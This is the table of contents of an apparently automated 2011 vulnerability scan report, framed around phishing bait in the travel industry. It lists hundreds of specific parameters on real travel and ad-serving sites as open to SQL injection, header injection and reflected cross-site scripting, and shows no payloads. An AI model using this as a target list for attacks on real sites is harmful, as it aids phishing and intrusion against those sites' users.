XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10022011-02

Travel Industry Segmented Report with respect to Phishing Bait

Report generated by XSS.CX at Sun Oct 02 21:15:06 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. SQL injection

1.1. http://ad.yieldmanager.com/imp [atf parameter]

1.2. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [JEB2 cookie]

1.3. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [REST URL parameter 1]

1.4. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [Referer HTTP header]

1.5. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [User-Agent HTTP header]

1.6. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [JEB2 cookie]

1.7. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [loc parameter]

1.8. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [REST URL parameter 1]

1.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [User-Agent HTTP header]

1.10. http://adserver.adtech.de/addyn|3.0|999|3106006|0|168|ADTECH [name of an arbitrarily supplied request parameter]

1.11. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176 [NGUserID cookie]

1.12. http://www.hotels.com/compare/hotel_dockingbar.html [SSPV cookie]

1.13. http://www.hotels.com/compare/hotel_dockingbar.html [SSRT cookie]

1.14. http://www.hotels.com/compare/hotel_dockingbar.html [__utmc cookie]

1.15. http://www.hotels.com/compare/hotel_dockingbar.html [name of an arbitrarily supplied request parameter]

1.16. http://www.hotels.com/hotel/details.html [REST URL parameter 2]

1.17. http://www.hotels.com/hotel/details.html [__utmc cookie]

1.18. http://www.hotels.com/hotel/details.html [channel cookie]

1.19. http://www.hotels.com/hotel/details.html [guid cookie]

1.20. http://www.hotels.com/hotel/hoteldata.html [__utmc cookie]

1.21. http://www.hotels.com/hoteldetails/urgencypopup.html [REST URL parameter 2]

1.22. http://www.hotels.com/hoteldetails/urgencypopup.html [mvthistory cookie]

1.23. http://www.revresda.com/event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/ [REST URL parameter 2]

1.24. http://www.revresda.com/event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html [REST URL parameter 2]

2. XPath injection

3. HTTP header injection

3.1. http://ad.doubleclick.net/getcamphist [src parameter]

3.2. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap [476949646137654800&c parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]

4.2. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]

4.3. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]

4.4. http://a.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]

4.5. http://a.collective-media.net/cmadj/cm.guardian/ [sz parameter]

4.6. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

4.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

4.8. http://ad.turn.com/server/pixel.htm [sp parameter]

4.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.11. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

4.12. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

4.13. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

4.14. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

4.15. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

4.16. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

4.17. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

4.18. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

4.19. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

4.20. http://api.wipmania.com/jsonp [callback parameter]

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

4.22. http://as.chango.com/links/adunit/1.31759988192e+12 [adpos parameter]

4.23. http://as.chango.com/links/adunit/1.31759988192e+12 [atype parameter]

4.24. http://as.chango.com/links/adunit/1.31759988192e+12 [bidder parameter]

4.25. http://as.chango.com/links/adunit/1.31759988192e+12 [datc parameter]

4.26. http://as.chango.com/links/adunit/1.31759988192e+12 [dc parameter]

4.27. http://as.chango.com/links/adunit/1.31759988192e+12 [dom parameter]

4.28. http://as.chango.com/links/adunit/1.31759988192e+12 [eid parameter]

4.29. http://as.chango.com/links/adunit/1.31759988192e+12 [ht parameter]

4.30. http://as.chango.com/links/adunit/1.31759988192e+12 [ibs parameter]

4.31. http://as.chango.com/links/adunit/1.31759988192e+12 [poo parameter]

4.32. http://as.chango.com/links/adunit/1.31759988192e+12 [sid parameter]

4.33. http://as.chango.com/links/adunit/1.31759988192e+12 [sig parameter]

4.34. http://as.chango.com/links/adunit/1.31759988192e+12 [st parameter]

4.35. http://as.chango.com/links/adunit/1.31759988192e+12 [stid parameter]

4.36. http://as.chango.com/links/adunit/1.31759988192e+12 [url parameter]

4.37. http://as.chango.com/links/adunit/1.31759988192e+12 [wh parameter]

4.38. http://as00.estara.com/as/InitiateCall2.php [template parameter]

4.39. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.40. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.41. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.42. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.43. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.44. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.45. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.46. http://bid.openx.net/json [c parameter]

4.47. http://d.tradex.openx.com/afr.php [cb parameter]

4.48. http://d.tradex.openx.com/afr.php [loc parameter]

4.49. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

4.50. http://d.tradex.openx.com/afr.php [zoneid parameter]

4.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

4.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

4.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

4.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

4.55. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 2]

4.56. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 3]

4.57. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 4]

4.58. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 5]

4.59. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 6]

4.60. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 7]

4.61. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [name of an arbitrarily supplied request parameter]

4.62. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [redir parameter]

4.63. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [sz parameter]

4.64. http://goal.us.intellitxt.com/al.asp [jscallback parameter]

4.65. http://goal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.66. http://goal.us.intellitxt.com/v4/init [jscallback parameter]

4.67. http://goal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.68. http://ib.adnxs.com/ab [ccd parameter]

4.69. http://ib.adnxs.com/ab [cnd parameter]

4.70. http://ib.adnxs.com/ab [referrer parameter]

4.71. http://ib.adnxs.com/ab [tt_code parameter]

4.72. http://js.revsci.net/gateway/gw.js [csid parameter]

4.73. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 4]

4.74. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 5]

4.75. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [name of an arbitrarily supplied request parameter]

4.76. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard [mbox parameter]

4.77. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard [mbox parameter]

4.78. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mbox parameter]

4.79. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mboxId parameter]

4.80. http://otter.topsy.com/stats.js [url parameter]

4.81. https://secure.mlb.com/style/nav_2011.jsp [section parameter]

4.82. http://servedby.flashtalking.com/imp/1/16628 [183799;201;js;BarclaysPremierLeague;RONMPU/?click parameter]

4.83. http://servedby.flashtalking.com/imp/1/16628 [cachebuster parameter]

4.84. http://servedby.flashtalking.com/imp/1/16628 [ftadz parameter]

4.85. http://servedby.flashtalking.com/imp/1/16628 [ftscw parameter]

4.86. http://servedby.flashtalking.com/imp/1/16628 [ftx parameter]

4.87. http://servedby.flashtalking.com/imp/1/16628 [fty parameter]

4.88. http://servedby.flashtalking.com/imp/1/16628 [name of an arbitrarily supplied request parameter]

4.89. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.90. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

4.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

4.92. http://static.igougo.com/traveldeals/iAuto.aspx [REST URL parameter 1]

4.93. http://tacoda-fatcat.search.aol.com/fa/eval [att parameter]

4.94. http://tacoda-fatcat.search.aol.com/fa/eval [query parameter]

4.95. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.96. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.97. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.98. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.99. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.100. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.101. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.102. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.103. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.104. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]

4.105. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]

4.106. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]

4.107. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]

4.108. http://travela.priceline.com/hotel/newHotelSearch.do [noWait parameter]

4.109. http://travela.priceline.com/hotel/searchHotels.do [CkInDay parameter]

4.110. http://travela.priceline.com/hotel/searchHotels.do [CkInMonth parameter]

4.111. http://travela.priceline.com/hotel/searchHotels.do [CkInYear parameter]

4.112. http://travela.priceline.com/hotel/searchHotels.do [CkOutDay parameter]

4.113. http://travela.priceline.com/hotel/searchHotels.do [CkOutMonth parameter]

4.114. http://travela.priceline.com/hotel/searchHotels.do [CkOutYear parameter]

4.115. http://travela.priceline.com/hotel/searchHotels.do [Initialized parameter]

4.116. http://travela.priceline.com/hotel/searchHotels.do [KMode parameter]

4.117. http://travela.priceline.com/hotel/searchHotels.do [RefClickID parameter]

4.118. http://travela.priceline.com/hotel/searchHotels.do [RefID parameter]

4.119. http://travela.priceline.com/hotel/searchHotels.do [affiliateSubID parameter]

4.120. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]

4.121. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]

4.122. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]

4.123. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]

4.124. http://travela.priceline.com/hotel/searchHotels.do [cityName parameter]

4.125. http://travela.priceline.com/hotel/searchHotels.do [homepage parameter]

4.126. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]

4.127. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]

4.128. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]

4.129. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]

4.130. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]

4.131. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]

4.132. http://travela.priceline.com/hotel/searchHotels.do [otherCityName parameter]

4.133. http://travela.priceline.com/hotel/searchHotels.do [passingValues parameter]

4.134. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]

4.135. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]

4.136. http://travela.priceline.com/hotel/searchHotels.do [refclickid parameter]

4.137. http://travela.priceline.com/hotel/searchHotels.do [refid parameter]

4.138. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]

4.139. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]

4.140. http://travela.priceline.com/hotel/searchHotels.do [searchType parameter]

4.141. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]

4.142. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]

4.143. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]

4.144. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]

4.145. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]

4.146. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]

4.147. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]

4.148. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]

4.149. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.150. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.151. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.152. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]

4.153. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]

4.154. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.155. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.156. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.157. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionID parameter]

4.158. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionLabel parameter]

4.159. http://www.aon.com/site/search.jsp [q parameter]

4.160. http://www.aon.com/site/search.jsp [q parameter]

4.161. http://www.aon.com/site/search.jsp [q parameter]

4.162. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]

4.163. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]

4.164. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]

4.165. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]

4.166. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]

4.167. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]

4.168. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]

4.169. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]

4.170. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]

4.171. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]

4.172. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]

4.173. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]

4.174. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]

4.175. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]

4.176. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]

4.177. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]

4.178. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]

4.179. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]

4.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]

4.181. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]

4.182. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]

4.183. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]

4.184. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]

4.185. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]

4.186. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]

4.187. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]

4.188. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]

4.189. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]

4.190. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]

4.191. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]

4.192. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]

4.193. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]

4.194. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]

4.195. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]

4.196. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]

4.197. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]

4.198. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]

4.199. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]

4.200. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]

4.201. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]

4.202. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]

4.203. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]

4.204. http://www.booking.com/load_times [REST URL parameter 1]

4.205. http://www.booking.com/load_times [REST URL parameter 1]

4.206. http://www.booking.com/logo [REST URL parameter 1]

4.207. http://www.booking.com/logo [REST URL parameter 1]

4.208. http://www.booking.com/searchresults.html [REST URL parameter 1]

4.209. http://www.booking.com/searchresults.html [REST URL parameter 1]

4.210. http://www.booking.com/searchresults.html [aid parameter]

4.211. http://www.booking.com/searchresults.html [aid parameter]

4.212. http://www.booking.com/searchresults.html [checkin_monthday parameter]

4.213. http://www.booking.com/searchresults.html [checkin_monthday parameter]

4.214. http://www.booking.com/searchresults.html [checkin_year_month parameter]

4.215. http://www.booking.com/searchresults.html [checkin_year_month parameter]

4.216. http://www.booking.com/searchresults.html [checkout_monthday parameter]

4.217. http://www.booking.com/searchresults.html [checkout_monthday parameter]

4.218. http://www.booking.com/searchresults.html [checkout_year_month parameter]

4.219. http://www.booking.com/searchresults.html [checkout_year_month parameter]

4.220. http://www.booking.com/searchresults.html [city parameter]

4.221. http://www.booking.com/searchresults.html [city parameter]

4.222. http://www.booking.com/searchresults.html [do_availability_check parameter]

4.223. http://www.booking.com/searchresults.html [do_availability_check parameter]

4.224. http://www.booking.com/searchresults.html [label parameter]

4.225. http://www.booking.com/searchresults.html [label parameter]

4.226. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]

4.227. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]

4.228. http://www.booking.com/searchresults.html [utm_campaign parameter]

4.229. http://www.booking.com/searchresults.html [utm_campaign parameter]

4.230. http://www.booking.com/searchresults.html [utm_medium parameter]

4.231. http://www.booking.com/searchresults.html [utm_medium parameter]

4.232. http://www.booking.com/searchresults.html [utm_source parameter]

4.233. http://www.booking.com/searchresults.html [utm_source parameter]

4.234. http://www.booking.com/searchresults.html [utm_term parameter]

4.235. http://www.booking.com/searchresults.html [utm_term parameter]

4.236. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]

4.237. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]

4.238. http://www.goal.com/en/comment/comments-box [allCommentsUrl parameter]

4.239. http://www.goal.com/en/teams/england/97/man-utd-news [REST URL parameter 5]

4.240. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]

4.241. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]

4.242. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.243. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.244. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.245. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.246. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.247. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.248. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hrnQuoteKey parameter]

4.249. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [inDate parameter]

4.250. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [name of an arbitrarily supplied request parameter]

4.251. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [outDate parameter]

4.252. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.253. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.254. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.255. http://www.hotelplanner.com/Search/Index.cfm [City parameter]

4.256. http://www.hotelplanner.com/Search/Index.cfm [Country parameter]

4.257. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]

4.258. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]

4.259. http://www.hotelplanner.com/Search/Index.cfm [NumRooms parameter]

4.260. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]

4.261. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]

4.262. http://www.hotelplanner.com/Search/Index.cfm [State parameter]

4.263. http://www.hotelplanner.com/Search/Index.cfm [adults parameter]

4.264. http://www.hotelplanner.com/Search/Index.cfm [name of an arbitrarily supplied request parameter]

4.265. http://www.hotelplanner.com/Search/Index.cfm [sc parameter]

4.266. http://www.hotelplanner.com/Search/index.cfm [HotelName parameter]

4.267. http://www.hotelplanner.com/Search/index.cfm [NumRooms parameter]

4.268. http://www.hotelplanner.com/Search/index.cfm [PriceMax parameter]

4.269. http://www.hotelplanner.com/Search/index.cfm [PriceMin parameter]

4.270. http://www.hotelplanner.com/Search/index.cfm [Rating parameter]

4.271. http://www.hotelplanner.com/Search/index.cfm [ViewType parameter]

4.272. http://www.hotelplanner.com/Search/index.cfm [btnGo.x parameter]

4.273. http://www.hotelplanner.com/Search/index.cfm [btnGo.y parameter]

4.274. https://www.hotelplanner.com/Accept/Reserve.cfm [DisplayNightlyRates parameter]

4.275. https://www.hotelplanner.com/Accept/Reserve.cfm [HotelName parameter]

4.276. https://www.hotelplanner.com/Accept/Reserve.cfm [NativeNightlyRates parameter]

4.277. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]

4.278. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]

4.279. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalDay parameter]

4.280. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalMonth parameter]

4.281. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalYear parameter]

4.282. https://www.hotelplanner.com/Accept/Reserve.cfm [bedType parameter]

4.283. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]

4.284. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]

4.285. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]

4.286. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]

4.287. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTaxesAndFees parameter]

4.288. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTotal parameter]

4.289. https://www.hotelplanner.com/Accept/Reserve.cfm [departureDay parameter]

4.290. https://www.hotelplanner.com/Accept/Reserve.cfm [departureMonth parameter]

4.291. https://www.hotelplanner.com/Accept/Reserve.cfm [departureYear parameter]

4.292. https://www.hotelplanner.com/Accept/Reserve.cfm [depositRequired parameter]

4.293. https://www.hotelplanner.com/Accept/Reserve.cfm [displayCurrencyCode parameter]

4.294. https://www.hotelplanner.com/Accept/Reserve.cfm [displayRoomRate parameter]

4.295. https://www.hotelplanner.com/Accept/Reserve.cfm [extraPersonFees parameter]

4.296. https://www.hotelplanner.com/Accept/Reserve.cfm [guaranteeRequired parameter]

4.297. https://www.hotelplanner.com/Accept/Reserve.cfm [hotelID parameter]

4.298. https://www.hotelplanner.com/Accept/Reserve.cfm [hrnQuoteKey parameter]

4.299. https://www.hotelplanner.com/Accept/Reserve.cfm [immediateChargeRequired parameter]

4.300. https://www.hotelplanner.com/Accept/Reserve.cfm [locale parameter]

4.301. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeCurrencyCode parameter]

4.302. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeRoomRate parameter]

4.303. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]

4.304. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]

4.305. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]

4.306. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]

4.307. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfRooms parameter]

4.308. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]

4.309. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]

4.310. https://www.hotelplanner.com/Accept/Reserve.cfm [promoType parameter]

4.311. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyID parameter]

4.312. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyType parameter]

4.313. https://www.hotelplanner.com/Accept/Reserve.cfm [rateChange parameter]

4.314. https://www.hotelplanner.com/Accept/Reserve.cfm [rateCode parameter]

4.315. https://www.hotelplanner.com/Accept/Reserve.cfm [rateDescription parameter]

4.316. https://www.hotelplanner.com/Accept/Reserve.cfm [rateFrequency parameter]

4.317. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeCode parameter]

4.318. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]

